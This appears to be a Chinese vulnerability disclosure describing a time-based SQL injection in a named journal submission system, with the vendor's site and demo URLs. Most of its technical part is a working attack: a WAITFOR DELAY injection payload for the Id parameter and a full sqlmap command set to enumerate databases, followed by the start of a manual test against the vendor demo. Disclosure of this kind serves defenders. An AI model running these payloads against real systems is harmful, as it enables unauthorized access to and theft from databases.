某期刊投稿系统SQL注入漏洞之一

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ~~总之影响众多投稿系统。。 ### 详细说明: 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据... 官网:http://www.025journal.com/ 演示系统: http://www.025journal.com/demo1/ http://www.025journal.com/demo2/ 客户案例:http://www.025journal.com/Web/CommonPage.aspx?Id=8 百度搜索: 投稿系统 技术支持:南京杰诺瀚软件 [<img src="https://images.seebug.org/upload/201410/231333002482576d93743a83e87902bffa1d0881.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/231333002482576d93743a83e87902bffa1d0881.png) ``` 注入链接:/web/CommonPage.aspx 注入参数:Id Payload:Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1);waitfor%20delay%20%270:0:5%27— SQLMAP注入命令:sqlmap -u 'http://xxxx/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1*' --dbms mssql --level 5 --risk 3 --technique=T --dbs -v 3 --batch ``` ### 漏洞证明: 以官网demo作为测试案例:http://www.025journal.com/demo1/ 1、手工报错测试 http://www.025journal.com/demo1/web/CommonPage.aspx?Id=13%27,1,1,1,1,1,1,1,1,1,1,1,1)-- [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息